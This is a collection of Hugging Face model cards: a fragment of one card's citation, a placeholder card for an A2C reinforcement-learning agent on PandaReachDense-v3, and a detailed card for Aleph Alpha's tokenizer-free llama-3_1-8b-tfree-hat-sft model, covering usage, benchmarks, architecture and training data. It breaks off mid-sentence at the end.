and Glushkova, Taisiya and Lavie, Alon and Coheur, Luisa and Martins, Andr{\'e} F. T.", booktitle = "Proceedings of the Seventh Conference on Machine Translation (WMT)", year = "2022", address = "Abu Dhabi, United Arab Emirates", publisher = "Association for Computational Linguistics", url = "https://aclanthology.org/2022.wmt-1.52", pages = "578--585", } ``` ## Acknowledgments - [Unbabel](https://unbabel.com/) team for the base COMET model - [Anthropic](https://anthropic.com/) for Claude Sonnet 4 used in knowledge distillation - [corp.dict.ge](https://corp.dict.ge/) for the Georgian-English corpus - All contributors to the [nmt_metrics_research](https://github.com/LukaDarsalia/nmt_metrics_research) project
Akchunks/a2c-PandaReachDense-v3
Akchunks
2025-05-30T09:50:11Z
0
0
stable-baselines3
[ "stable-baselines3", "PandaReachDense-v3", "deep-reinforcement-learning", "reinforcement-learning", "model-index", "region:us" ]
reinforcement-learning
2025-05-30T09:46:02Z
--- library_name: stable-baselines3 tags: - PandaReachDense-v3 - deep-reinforcement-learning - reinforcement-learning - stable-baselines3 model-index: - name: A2C results: - task: type: reinforcement-learning name: reinforcement-learning dataset: name: PandaReachDense-v3 type: PandaReachDense-v3 metrics: - type: mean_reward value: -0.19 +/- 0.05 name: mean_reward verified: false --- # **A2C** Agent playing **PandaReachDense-v3** This is a trained model of a **A2C** agent playing **PandaReachDense-v3** using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3). ## Usage (with Stable-baselines3) TODO: Add your code ```python from stable_baselines3 import ... from huggingface_sb3 import load_from_hub ... ```
Aleph-Alpha/llama-3_1-8b-tfree-hat-sft
Aleph-Alpha
2025-05-30T09:50:07Z
11
12
null
[ "safetensors", "hierarchical_autoregressive_transformer", "Aleph Alpha Research", "pytorch", "Hirarchical Autoregressive Transformer", "HAT", "custom_code", "en", "de", "arxiv:2501.10322", "base_model:Aleph-Alpha/llama-3_1-8b-tfree-hat-base", "base_model:finetune:Aleph-Alpha/llama-3_1-8b-tfree-hat-base", "license:other", "region:us" ]
null
2025-04-25T16:36:56Z
--- language: - en - de license: other thumbnail: https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-sft/raw/main/source/aleph_alpha_logo_thumbnail.png license_name: open-aleph-license license_link: LICENSE base_model: Aleph-Alpha/llama-3_1-8b-tfree-hat-base tags: - Aleph Alpha Research - pytorch - Hirarchical Autoregressive Transformer - HAT model-index: - name: llama-3_1-8b-tfree-hat-sft results: [] --- <div align="center"> <img src="source/aleph_alpha_logo.svg" width="60%" alt="Aleph Alpha Research Logo" /> </div> <div align="center" style="line-height: 1;"> <a href="https://aleph-alpha.com/research/" target="_blank" style="margin: 2px;"> <img alt="Homepage" src="source/aleph_alpha_homepage_badge.svg" style="vertical-align: middle;" /> </a> <a href="https://huggingface.co/Aleph-Alpha" target="_blank" style="margin: 2px;"> <img alt="Hugging Face" src="https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-AlephAlpha%20Research-e3ff00?color=e3ff00&amp;logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <div align="center" style="line-height: 1;"> <a href="https://twitter.com/Aleph__Alpha" target="_blank" style="margin: 2px;"> <img alt="Twitter Follow" src="https://img.shields.io/badge/Twitter-AlephAlpha_Research-white?logo=x&amp;logoColor=white" style="display: inline-block; vertical-align: middle;"/> </a> <a href="https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-sft/blob/main/LICENSE" style="margin: 2px;"> <img alt="License" src="https://img.shields.io/badge/License-Open Aleph License-white?&amp;color=white" style="display: inline-block; vertical-align: middle;"/> </a> </div> <hr> # llama-3_1-8b-tfree-hat-sft <!-- markdownlint-disable first-line-h1 --> <!-- markdownlint-disable html --> <!-- markdownlint-disable no-duplicate-header --> This model card provides an overview of our **tokenizer-free llama-3.1-8b-tfree-hat model family** based on Llama, which encompasses three foundation models developed by Aleph Alpha Research* and publicly available under the Open Aleph License, a license explicitly allowing for non-commercial research and educational use. The models are based on the original Llama 3.1 model’s pre-trained backbone, replacing the Llama tokenizer with our Hierarchical Autoregressive Transformer (HAT) architecture which is described originally in our [paper](https://arxiv.org/abs/2501.10322). This novel architecture integrates character-level encoding and decoding with the word-level backbone, allowing for improved text compression (less sequence positions) and performance in the languages it has been trained on, and potentially higher robustness to prompt changes, as well as improved adaptability to new languages & domains via fine-tuning. The models were pre- and post-trained and direct-preference-optimized in English & German on carefully curated data in compliance with applicable EU and national regulations, including copyright and data privacy laws. They show strong proficiency in German, beating the original Llama 3.1 on most benchmarks also in English. The direct-preference-optimization of [llama-3_1-8b-tfree-hat-dpo](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-dpo) prioritizes helpfulness and instruction following, making the model suitable for sensitive applications without the risk of over-refusal. The models have not been optimized for code generation and math and are thus not evaluated extensively on respective benchmarks. Please note that the realized inference speed strongly depends on the maturity of the inference implementation beyond the intrinsic text compression of any model. The current publicly available inference implementation is in a non-optimized state, hence any benchmark on speed must take account of that. You can find all model weights and their corresponding safetensors conversions at the following links: | Model Name | Description | | --- | --- | | `llama-3_1-8b-tfree-hat-base` | [Link](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-base) - uses the Llama-3.1 8B base pre-trained checkpoint as initialization for the backbone, and has been continuously pre-trained with the HAT architecture in English and German. | | `llama-3_1-8b-tfree-hat-sft` | [Link](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-sft) - is a supervised fine-tuned `llama-3_1-8b-tfree-hat-base`. | | `llama-3_1-8b-tfree-hat-dpo` | [Link](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-dpo) - is a direct-preference-optimized `llama-3_1-8b-tfree-hat-sft` | # Model Access We provide access to our models through the channels listed below. - **HuggingFace**: The model’s weights as well as basic inference implementation are available on HuggingFace under the [Open Aleph License](https://github.com/Aleph-Alpha/.github/blob/main/oal.pdf), a license explicitly allowing for non-commercial research and educational use. We do not collect PII (personally identifiable information) for any of these channels. We do not log user inputs to the models. We do not train on user data. **Note**: The same models are made available to users regardless of their geographic location and their input language but subject to sanction regimes, technology export regulations, and other restrictions that may apply. The same offering is provided to all countries within and external to the European Union if no legal restrictions apply. # How to use ## Inference We provide an inference module compatible with HuggingFace Transformers for running model inference. For compatibility between the LLaMA components and our original codebase, we recommend pinning the transformers library to version 4.46.3. Before executing the inference example below, make sure the [hat-splitter package](https://pypi.org/project/hat-splitter/) is installed in your environment. ```shell pip install 'hat-splitter>=0.1.9' 'transformers==4.46.3' torch pip install flash_attn ``` Download model weights and run inference using the following example: ```python import torch from transformers import AutoModelForCausalLM INPUT ="When was Rome founded?" MODEL_ID = "Aleph-Alpha/llama-3_1-8b-tfree-hat-sft" model = AutoModelForCausalLM.from_pretrained( trust_remote_code=True, pretrained_model_name_or_path=MODEL_ID, attn_implementation="flash_attention_2", ).to("cuda", torch.bfloat16) input_ids, cumulative_word_lengths = model._prepare_input(INPUT, add_llama_template=True) model_output = model.generate( input_ids, cumulative_seq_lengths_per_word=cumulative_word_lengths, max_new_tokens=300, use_cache=False, ) print("Prompt: ", INPUT) print("Completion: ", model_output.completion_text) ``` ## Prompt formatting The prompt format used for our models is identical to the [Llama prompt format](https://www.llama.com/docs/model-cards-and-prompt-formats/llama3_1/). We highly recommend using it when prompting the models to ensure optimal performance for the supervised fine-tuned and direct-preference-optimized model versions. You can format your prompt in the recommended format by setting `add_llama_template=True` in the `model._prepare_input` method. # Evaluation **Performance**: Our T-Free models deliver performance on par with current state-of-the-art OS memory-equivalent models in both English and German. For evaluation purposes, we compare our tokenizer-free base model with [Llama 3.1 8B Base](https://huggingface.co/meta-llama/Llama-3.1-8B), our SFT model with [Tulu 3.1 8B SFT](https://huggingface.co/allenai/Llama-3.1-Tulu-3-8B-SFT), and our DPO model with [Llama 3.1 8B Instruct](https://huggingface.co/meta-llama/Llama-3.1-8B-Instruct) and [Tulu 3.1 8B](https://huggingface.co/allenai/Llama-3.1-Tulu-3.1-8B). Respective benchmarks and results can be found in the tables below. **Efficiency**: Our tokenizer-free approach results in improved text compression, providing a foundation for improved efficiency in inference speed. We measure in terms of words processed across all languages and domains. We define the metric as **tokenizer fertility** or **bytes per sequence position**, where a higher value indicates better performance. Latency and throughput are currently out of scope for research-centric evaluations and will be addressed in the future. Currently, our evaluation framework automatically measures **bytes per sequence position** across datasets, allowing us to derive text compression scores and analyze variations across different dataset distributions. The end to end resulting efficiency is dependend on the inference implementation beyond the scope of the here provided inference implementation and reported compression scores. **Disclaimer**: The results presented below were generated using our internal inference implementation, not the inference module mentioned above. As a sanity check, we did reproduced some of the benchmarks using our evaluation framework with the hugginface inference code, but some results might still deviate. We plan to make source-available both our evaluation framework and a high-performance VLLM integration for this model in the coming weeks to ensure reproducibility. Our goal with this initial release is to provide the community with a straightforward codebase that demonstrates the architecture and supports basic inference capabilities. **Metric Glossary** `log_acc`: Average Accuracy Loglikelihood<br> `norm_log_acc`: Average Normalized Loglikelihood Accuracy<br> `comp_acc`: Average Completion Accuracy<br> `norm_prob_mass`: Average Probability Mass Normalized<br> `bleu`: Average BLEU Score<br> `rouge_gm`: Average ROUGE-Geometric-Mean<br> `F1`: Average F1<br> `CS`: Chatbot Style<br> `IF`: Instruction Following<br> `LC`: Language Consistency<br> `CI`: Concordance Index<br> `ES`: Exponential Similarity ## Pre-training Benchmarks | Group | Task | Metric Name | Num Fewshot | [llama-3_1-8b-tfree-hat-base](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-base) | [Llama-3.1-8B](https://huggingface.co/meta-llama/Llama-3.1-8B) | [llama-3_1-8b-tfree-hat-base](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-base) Compression | [Llama-3.1-8B](https://huggingface.co/meta-llama/Llama-3.1-8B) Compression | | --- | --- | --- | --- | --- | --- | --- | --- | | Knowledge | MMLU | `norm_log_acc` | 5 | 0.657 | **0.668** | **5.184** | 4.278 | | Knowledge | Full Text MMLU | `norm_log_acc` | 5 | **0.638** | 0.624 | **5.307** | 4.557 | | Knowledge | MMLU Pro | `norm_log_acc` | 5 | **0.368** | 0.367 | **4.734** | 3.731 | | Knowledge | GPQA | `log_acc` | 0 | **0.308** | 0.306 | **4.932** | 3.519 | | Knowledge | BBH | `norm_log_acc` | 3 | **0.473** | 0.472 | **4.665** | 3.788 | | Knowledge | OpenBookQA | `norm_log_acc` | 10 | 0.466 | **0.478** | **4.982** | 4.724 | | Knowledge | TriviaQA | `comp_acc` | 5 | 0.623 | **0.695** | **5.324** | 4.218 | | Knowledge | TruthfulQA | `norm_prob_mass` | 6 | **0.166** | **0.166** | **6.575** | 4.197 | | Reasoning | ARC Easy | `norm_log_acc` | 25 | **0.870** | 0.858 | **5.526** | 4.936 | | Reasoning | ARC Challenge | `norm_log_acc` | 25 | **0.625** | 0.579 | **5.514** | 4.924 | | Reasoning | Winogrande | `norm_log_acc` | 5 | 0.691 | **0.695** | **5.158** | 4.909 | | Reasoning | HellaSwag | `norm_log_acc` | 10 | 0.793 | **0.817** | **5.338** | 4.655 | | German | MMMLU | `norm_log_acc` | 5 | **0.591** | 0.578 | **6.056** | 3.410 | | German | [ARC Easy DE](https://huggingface.co/datasets/openGPT-X/arcx) | `norm_log_acc` | 25 | **0.778** | 0.713 | **6.604** | 3.685 | | German | [ARC Easy DE](https://huggingface.co/datasets/openGPT-X/arcx) | `norm_log_acc` | 25 | **0.538** | 0.473 | **6.571** | 3.684 | | German | [Winogrande DE](https://huggingface.co/datasets/demelin/wino_x) | `norm_log_acc` | 5 | **0.789** | 0.765 | **5.627** | 3.671 | | German | [HellaSwag DE](https://huggingface.co/datasets/openGPT-X/hellaswagx) | `norm_log_acc` | 10 | **0.646** | 0.626 | **6.496** | 3.666 | | German | [TruthfulQA DE](https://huggingface.co/datasets/openGPT-X/truthfulqax) | `norm_prob_mass` | 6 | **0.166** | **0.166** | **6.006** | 3.406 | | German | Lambada | `comp_acc` | 5 | **0.454** | 0.449 | **5.777** | 3.552 | | German | [GSM8K DE](https://huggingface.co/datasets/openGPT-X/gsm8kx) | `comp_acc` | 8 | **0.440** | 0.406 | **4.372** | 2.932 | | German | WMT16 | `bleu` | 3 | **36.025** | 32.873 | **6.203** | 4.204 | | Math | GSM8K | `comp_acc` | 8 | **0.509** | **0.509** | **3.838** | 3.334 | | Long context | GSM8K | `comp_acc` | 16 | **0.540** | 0.478 | **3.839** | 3.340 | | Safety | Winogender | `norm_log_acc` | 5 | 0.624 | **0.626** | **5.232** | 4.799 | ## SFT Benchmarks **MTBench winrates** German MTBench numbers are based on our [German version of MTBench](https://huggingface.co/datasets/Aleph-Alpha/MTBench-German). | | **vs.** allenai/Llama-3.1-Tulu-3-8B-SFT **(Eng)** | **vs.** allenai/Llama-3.1-Tulu-3-8B-SFT **(Ger)** | | --- | --- | --- | | [llama-3_1-8b-tfree-hat-sft](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-sft) | **65.0** | **64.1** | | Group | Task | Metric Name | Num Fewshot | [llama-3_1-8b-tfree-hat-sft](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-sft) | [Llama-3.1-Tulu-3-8B-SFT](https://huggingface.co/allenai/Llama-3.1-Tulu-3-8B-SFT) | [llama-3_1-8b-tfree-hat-sft](https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-sft) Compression | [Llama-3.1-Tulu-3-8B-SFT](https://huggingface.co/allenai/Llama-3.1-Tulu-3-8B-SFT) Compression | | --- | --- | --- | --- | --- | --- | --- | --- | | Knowledge | MMLU | norm\_log\_acc | 5 | 0.655 | **0.669** | **5.818** | 4.153 | | Knowledge | Full Text MMLU | norm\_log\_acc | 5 | 0.653 | **0.671** | **5.849** | 4.408 | | Knowledge | MMLU Pro | norm\_log\_acc | 5 | **0.377** | 0.317 | **5.135** | 4.077 | | Knowledge | GPQA | log\_acc | 0 | 0.288 | **0.260** | **5.260** | 3.408 | | Knowledge | BBH | norm\_log\_acc | 3 | 0.492 | **0.494** | **5.332** | 3.668 | | Knowledge | OpenBookQA | norm\_log\_acc | 10 | 0.486 | **0.504** | **7.101** | 4.041 | | Knowledge | TriviaQA | comp\_acc | 5 | 0.585 | **0.648** | **6.963** | 3.928 | | Knowledge | TruthfulQA | norm\_prob\_mass | 6 | **0.171** | 0.167 | **6.575** | 3.807 | | Reasoning | ARC Easy | norm\_log\_acc | 25 | **0.890** | 0.877 | **7.018** | 4.497 | | Reasoning | ARC Challenge | norm\_log\_acc | 25 | **0.647** | 0.617 | **6.860** | 4.522 | | Reasoning | Winogrande | norm\_log\_acc | 5 | 0.680 | **0.700** | **6.856** | 4.116 | | Reasoning | HellaSwag | norm\_log\_acc | 10 | 0.748 | **0.802** | **5.980** | 4.427 | | German | MMMLU | norm\_log\_acc | 5 | **0.595** | 0.572 | **6.630** | 3.383 | | German | [ARC Easy DE](https://huggingface.co/datasets/openGPT-X/arcx) | norm\_log\_acc | 25 | **0.800** | 0.742 | **7.872** | 3.607 | | German | [ARC Challenge DE](https://huggingface.co/datasets/openGPT-X/arcx) | norm\_log\_acc | 25 | **0.573** | 0.500 | **7.798** | 3.610 | | German | [Winogrande DE](https://huggingface.co/datasets/demelin/wino_x) | norm\_log\_acc | 5 | **0.763** | 0.754 | **7.225** | 3.391 | | German | [HellaSwag DE](https://huggingface.co/datasets/openGPT-X/hellaswagx) | norm\_log\_acc | 10 | 0.616 | **0.636** | **6.971** | 3.603 | | German | [TruthfulQA DE](https://huggingface.co/datasets/openGPT-X/truthfulqax) | norm\_prob\_mass | 6 | **0.167** | 0.166 | **7.378** | 3.276 | | German | Lambada | comp\_acc | 5 | 0.366 | **0.488** | **6.429** | 3.493 | | German | [GSM8K DE](https://huggingface.co/datasets/openGPT-X/gsm8kx) | comp\_acc | 8 | 0.556 | **0.598** | **4.835** | 2.951 | | German | WMT16 | bleu | 3 | **35.770** | 34.302 | **6.806** | 3.999 | | German | WMT16 Instruct | bleu | 3 | **36.400** | 34.297 | **6.862** | 4.062 | | Instruction Following | Alpaca Eval | CS | 0 | **0.334** | 0.104 | **5.386** | 3.968 | | Instruction Following | Alpaca Eval | IF | 0 | **0.913** | 0.908 | **5.386** | 3.968 | | Instruction Following | Alpaca Eval | LC | 0 | **0.996** | 0.986 | **5.386** | 3.968 | | Long context | QuALITY | log\_acc | 0 | 0.388 | **0.414** | **4.867** | 4.274 | | Long context | ZeroSCROLLS GovReport | rouge\_gm | 0 | **0.264** | 0.190 | **6.011** | 5.074 | | Long context | ZeroSCROLLS BookSumSort | CI | 0 | 0.073 | **0.131** | **5.412** | 4.411 | | Long context | ZeroSCROLLS SummScreenFD | rouge\_gm | 0 | **0.122** | 0.088 | **4.896** | 4.093 | | Long context | ZeroSCROLLS MuSiQue | F1 | 0 | **0.307** | 0.182 | **5.638** | 4.387 | | Long context | ZeroSCROLLS Qasper | F1 | 0 | **0.281** | 0.180 | **5.932** | 4.807 | | Long context | ZeroSCROLLS QuALITY | log\_acc | 0 | **0.762** | 0.714 | **4.565** | 4.216 | | Long context | ZeroSCROLLS SpaceDigest | ES | 0 | 0.294 | **0.499** | **6.382** | 4.506 | | Long context | ZeroSCROLLS QMSum | rouge\_gm | 0 | 0.134 | **0.154** | **5.445** | 4.266 | | Long context | ZeroSCROLLS SQuALITY | rouge\_gm | 0 | **0.144** | 0.122 | **5.053** | 4.213 | | Long context | Ada-LEval TextSort Choices | log\_acc | 0 | 0.25 | **0.283** | **5.106** | 4.108 | | Long context | Ada-LEval TextSort | comp\_acc | 0 | **0.06** | 0.05 | **5.107** | 4.153 | | Safety | Winogender | norm\_log\_acc | 5 | 0.550 | **0.583** | **6.875** | 4.157 | ## DPO Benchmarks **MTBench winrates** German MTBench numbers are based on our German version of [MTBench](https://huggingface.co/datasets/Aleph-Alpha/MTBench-German). | | **vs.** [Llama-3.1-8B-Instruct](https://huggingface.co/meta-llama/Llama-3.1-8B-Instruct) **(Eng)** | **vs.** [Llama-3.1-Tulu-3.1-8B](https://huggingface.co/allenai/Llama-3.1-Tulu-3.1-8B) **(Eng)** | **vs.** [Llama-3.1-8B-Instruct](https://huggingface.co/meta-llama/Llama-3.1-8B-Instruct) **(Ger)** | **vs.** [Llama-3.1-Tulu-3.1-8B](https://huggingface.co/allenai/Llama-3.1-Tulu-3.1-8B) **(Ger)** | | --- | --- | --- | --- | --- | | llama-3_1-8b-tfree-hat-dpo | **61.6** | **51.3** | **70.9** | **50.9** | | Group | Task | Metric Name | Num Fewshot | [llama-3_1-8b-tfree-hat-dpo]((https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-dpo)) | [Llama-3.1-8B-Instruct](https://huggingface.co/meta-llama/Llama-3.1-8B-Instruct) | [Llama-3.1-Tulu-3.1-8B](https://huggingface.co/allenai/Llama-3.1-Tulu-3.1-8B) | [llama-3_1-8b-tfree-hat-dpo]((https://huggingface.co/Aleph-Alpha/llama-3_1-8b-tfree-hat-dpo)) Compression | [Llama-3.1-8B-Instruct](https://huggingface.co/meta-llama/Llama-3.1-8B-Instruct) Compression | [Llama-3.1-Tulu-3.1-8B](https://huggingface.co/allenai/Llama-3.1-Tulu-3.1-8B) Compression | | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | | Knowledge | MMLU | `norm_log_acc` | 5 | 0.657 | **0.681** | 0.664 | **5.818** | 4.885 | 4.153 | | Knowledge | Full Text MMLU | `norm_log_acc` | 5 | 0.662 | **0.680** | 0.677 | **5.849** | 5.075 | 4.408 | | Knowledge | MMLU Pro | `norm_log_acc` | 5 | 0.382 | **0.402** | 0.322 | **5.135** | 4.077 | 4.077 | | Knowledge | GPQA | `log_acc` | 0 | 0.279 | **0.306** | 0.271 | **5.260** | 3.771 | 3.408 | | Knowledge | BBH | `norm_log_acc` | 3 | 0.501 | **0.522** | 0.494 | **5.332** | 4.374 | 3.668 | | Knowledge | OpenBookQA | `norm_log_acc` | 10 | 0.498 | 0.526 | **0.528** | **7.101** | 6.973 | 4.041 | | Knowledge | TriviaQA | `comp_acc` | 5 | 0.416 | **0.646** | 0.612 | **6.886** | 6.020 | 3.934 | | Knowledge | TruthfulQA | `norm_prob_mass` | 6 | **0.178** | 0.171 | 0.173 | **6.575** | 5.553 | 3.807 | | Reasoning | ARC Easy | `norm_log_acc` | 25 | **0.896** | 0.875 | 0.873 | **7.018** | 6.396 | 4.497 | | Reasoning | ARC Challenge | `norm_log_acc` | 25 | **0.667** | 0.638 | 0.650 | **6.860** | 6.218 | 4.522 | | Reasoning | Winogrande | `norm_log_acc` | 5 | **0.686** | 0.657 | 0.683 | **6.856** | 6.517 | 4.116 | | Reasoning | HellaSwag | `norm_log_acc` | 10 | 0.776 | 0.776 | **0.807** | **5.980** | 5.274 | 4.427 | | German | MMMLU | `norm_log_acc` | 5 | **0.598** | 0.590 | 0.572 | **6.630** | 3.912 | 3.383 | | German | [ARC Easy DE](https://huggingface.co/datasets/openGPT-X/arcx) | `norm_log_acc` | 25 | **0.811** | 0.729 | 0.751 | **7.872** | 4.910 | 3.607 | | German | [ARC Challenge DE](https://huggingface.co/datasets/openGPT-X/arcx) | `norm_log_acc` | 25 | **0.597** | 0.503 | 0.525 | **7.798** | 4.862 | 3.610 | | German | [Winogrande DE](https://huggingface.co/datasets/demelin/wino_x) | `norm_log_acc` | 5 | **0.751** | 0.729 | 0.711 | **7.225** | 5.310 | 3.391 | | German | [HellaSwag DE](https://huggingface.co/datasets/openGPT-X/hellaswagx) | `norm_log_acc` | 10 | **0.687** | 0.626 | 0.657 | **6.971** | 4.137 | 3.603 | | German | [TruthfulQA DE](https://huggingface.co/datasets/openGPT-X/truthfulqax) | `norm_prob_mass` | 6 | **0.173** | 0.168 | 0.171 | **7.378** | 4.581 | 3.276 | | German | Lambada | `comp_acc` | 5 | 0.381 | **0.421** | 0.428 | **6.418** | 4.191 | 3.494 | | German | [GSM8K DE](https://huggingface.co/datasets/openGPT-X/gsm8kx) | `comp_acc` | 8 | 0.540 | 0.201 | **0.724** | **4.860** | 3.320 | 2.963 | | German | WMT16 | `bleu` | 3 | **34.395** | 34.224 | 32.912 | **6.805** | 5.061 | 4.000 | | German | WMT16 Instruct | `bleu` | 3 | **34.717** | 34.260 | 33.089 | **6.635** | 5.130 | 4.063 | | Math | GSM8K | `comp_acc` | 8 | 0.664 | 0.757 | **0.870** | **4.351** | 3.794 | 3.356 | | Instruction Following | Alpaca Eval | `CS` | 0 | **0.403** | 0.209 | 0.109 | **5.478** | 4.701 | 4.442 | | Instruction Following | Alpaca Eval | `IF` | 0 | 0.927 | 0.935 | **0.952** | **5.478** | 4.701 | 4.442 | | Instruction Following | Alpaca Eval | `LC` | 0 | **0.996** | 0.995 | 0.985 | **5.478** | 4.701 | 4.442 | | Long context | QuALITY | `log_acc` | 0 | 0.384 | 0.412 | **0.425** | **4.867** | 4.290 | 4.274 | | Long context | ZeroSCROLLS GovReport | `rouge_gm` | 0 | **0.308** | 0.246 | 0.261 | **6.034** | 5.105 | 5.107 | | Long context | ZeroSCROLLS BookSumSort | `CI` | 0 | 0.015 | 0.037 | **0.141** | 4.255 | **4.418** | 4.411 | | Long context | ZeroSCROLLS SummScreenFD | `rouge_gm` | 0 | **0.111** | 0.107 | 0.098 | **4.824** | 3.761 | 3.752 | | Long context | ZeroSCROLLS MuSiQue | `F1` | 0 | **0.230** | 0.200 | 0.145 | **5.637** | 4.427 | 4.387 | | Long context | ZeroSCROLLS Qasper | `F1` | 0 | 0.251 | **0.235** | 0.221 | **5.933** | 4.826 | 4.808 | | Long context | ZeroSCROLLS QuALITY | `log_acc` | 0 | **0.810** | 0.810 | 0.714 | **4.565** | 4.230 | 4.215 | | Long context | ZeroSCROLLS SpaceDigest | `ES` | 0 | 0.316 | **0.638** | 0.490 | **5.183** | 4.518 | 4.505 | | Long context | ZeroSCROLLS QMSum | `rouge_gm` | 0 | 0.134 | 0.142 | **0.144** | **5.041** | 4.279 | 4.277 | | Long context | ZeroSCROLLS SQuALITY | `rouge_gm` | 0 | **0.164** | 0.164 | 0.163 | **4.967** | 4.240 | 4.241 | | Long context | Ada-LEval TextSort Choices | `log_acc` | 0 | 0.260 | **0.282** | 0.275 | **5.106** | 4.117 | 4.108 | | Long context | Ada-LEval TextSort | `comp_acc` | 0 | **0.06** | 0.036 | 0.05 | **5.107** | 4.159 | 4.154 | | Safety | Winogender | `norm_log_acc` | 5 | 0.568 | **0.639** | 0.597 | **6.875** | 6.603 | 4.157 | # Training Details ## Model Architecture The model uses a hierarchical autoregressive architecture consisting of three components: encoder, backbone, and decoder together with connector layers between components. Encoder, backbone, and decoder are all instances of autoregressive transformers with pre-norm residual blocks in the style of Llama, using a SwiGLU unit as a feed-forward block, with all model parameters active during training and inference. The backbone model uses standard causal attention, while the encoder and decoder use local causal attention with a finite look-back window. The encoder processes input text as a sequence of UTF-8 bytes and produces a sequence of activations of the same length. This sequence is then split into chunks corresponding to words or other semantic units in the text (this is further explained below). In the encoder-backbone connector layer, for each word, a learned latent vector cross-attends to its corresponding chunk of encoder activations. The resulting sequence of latent vectors then serves as input to the backbone. The backbone processes this latent sequence and produces a sequence of word-level representations. Finally, the decoder module is another transformer that acts on the byte-level activations and has an LM head that produces next-byte probabilities. To make use of the higher level information stored in the word-level embeddings during decoding, another cross-attention mechanism is used. In each transformer block of the decoder, every byte-level position cross-attends to the backbone’s word-level representations that correspond to the words preceding this byte. ## Encoder module | | **8B** | | --- | --- | | Number of layers | 6 | | Number of attention heads | 8 | | Head size | 128 | | Number of Key-Value heads | 8 | | Hidden size | 1024 | | Cross-attention hidden size | 4096 | | MLP expansion factor | 2.75 | | MLP type | SwiGLU | | Sequence length | 262144 | | Position embeddings | RoPE with base 1e5 | | Attention type | causal, local with window size 768 | ## Backbone module | | **8B** | | --- | --- | | Number of layers | 32 | | Number of attention heads | 32 | | Head size | 128 | | Number of Key-Value heads | 8 | | Hidden size | 4096 | | MLP expansion factor | 3.5 | | MLP type | SwiGLU | | Sequence length | 32900 | | Position embeddings | RoPE with base 5e5 | | Attention type | causal | ## Decoder module | | **8B** | | --- | --- | | Number of layers | 4 | | Number of attention heads | 8 | | Head size | 128 | | Number of Key-Value heads | 8 | | Hidden size | 1024 | | Cross-attention hidden size | 4096 | | MLP expansion factor | 2.75 | | MLP type | SwiGLU | | Sequence length | 262144 | | Position embeddings | RoPE with base 1e5 | | Attention type | causal, local with window size 768 | **Total parameter count** 8B: `7,192,495,104` **Word splitter** To split arbitrary byte sequences, we adopted the guidelines from [UAX #29](https://unicode.org/reports/tr29/), which splits text into words for common Western languages but also produces meaningful semantic units for other types of languages (e.g. Chinese, Japanese, Korean). From now on, we refer to these splits as words. We also merged leading whitespace and trailing punctuation into the words to reduce sequence length at the word level. To improve the processing of code and math documents, we made additional adjustments to the Unicode splitter. First, we split instances of camel cases like FooBar into Foo and Bar. Second, we treated math symbols (again by Unicode standard) as separate words. ## Pre-Training **Approach** We randomly initialized all model parameters of the encoder, decoder, and connector layers. The backbone architecture precisely matches the Llama architecture, this allowed us to initialize the weights to the pre-trained Llama 3 weights. The model was then trained on the next-byte-prediction objective on a large and diverse document corpus (see below). Initially, we trained on sequences up to 3500 words for a total amount of 134B words. We then continued training on sequences of up to 32900 words for another 84B words, upweighting longer documents to make use of the extended context. The training was conducted in our [Scaling framework](https://github.com/Aleph-Alpha/scaling). **Data sources** The model was trained on a filtered subset of diverse corpora of text data including proprietary curated datasets, high-quality web content, public domain sources, German texts, mathematical texts, and programming code. The proportions and sources of data we used in the pre-training were: English Language Data (70%) - curated web and synthetic data (63%) - high quality curated sources such as Wikipedia and public domain books (7%) German Language Data (7%) - curated web and synthetic data (6.3%) - high quality curated sources such as Wikipedia and public domain books (0.7%) Mathematical Content (5%) - mathematical code and proofs (2%) - mathematical word problems and equations (3%) Programming Code (18%) - general programming code (11%) - high-quality and synthetic Python code (7%) ## Data curation We applied a range of curation techniques, e.g., for German as described in [Aleph-Alpha-GermanWeb](https://huggingface.co/datasets/Aleph-Alpha/Aleph-Alpha-GermanWeb). These include but are not limited to: - URL filtering. We used a URL filter developed to filter out fraudulent, harmful, and illegal content from an explicit blocklist, e.g., adult websites, or URLs containing words associated with fraudulent, harmful, or adult content. - Text extraction. Natural language texts which were embedded HTML and other web programming languages were extracted using the [Resiliparse](https://github.com/chatnoir-eu/chatnoir-resiliparse) text extractor. - Language identification. We used a [fastText language classifier](https://fasttext.cc/docs/en/language-identification.html) trained on character n-grams from Wikipedia to identify, retain, and sort texts into English and German. - Repetition removal. We applied heuristic methods for detection and removal of repetitions on the line, paragraph, and character level. - Document- and line-level filtering. We utilized additional document-level heuristics to ensure documents had reasonable numbers and quality of words, naturalistic symbols-to-words and numbers-to-words ratios, not predominantly made up of bullet points, and a sufficient quantity of real words. - Deduplication. Using exact and fuzzy deduplication to remove duplicate documents. ## Synthetic data We also generated synthetic data by using permissively-licensed LLMs. ## Instruction Fine-tuning ### Approach We optimized `llama-3_1-8b-tfree-hat-base` for instruction-following using a standard post-training pipeline. First, we applied supervised fine-tuning (SFT) to train the model on both single-turn and multi-turn (chat) instruction-following tasks. Next, we aligned our model for helpfulness and, in parts, safety using Direct Preference Optimization (DPO). ### Data The data used for instruction fine-tuning is based on a mixture of user prompts and model competitions. The data mixture consists of roughly 2M samples from diverse datasets including but not limited to: specialized reasoning datasets covering mathematics, programming, and logical inference; human feedback focused on helpful and harmless responses; a small curated set for specific response patterns; safety and robustness subsets for appropriate boundaries; collaborative conversational data; multilingual conversation prompts; tabular data reasoning for structured information; and formal mathematics with advanced problems. We synthesized responses to the prompts using Qwen 2.5-32B and Qwen 2.5-72B. Additionally, we improved German performance by translating English prompts using 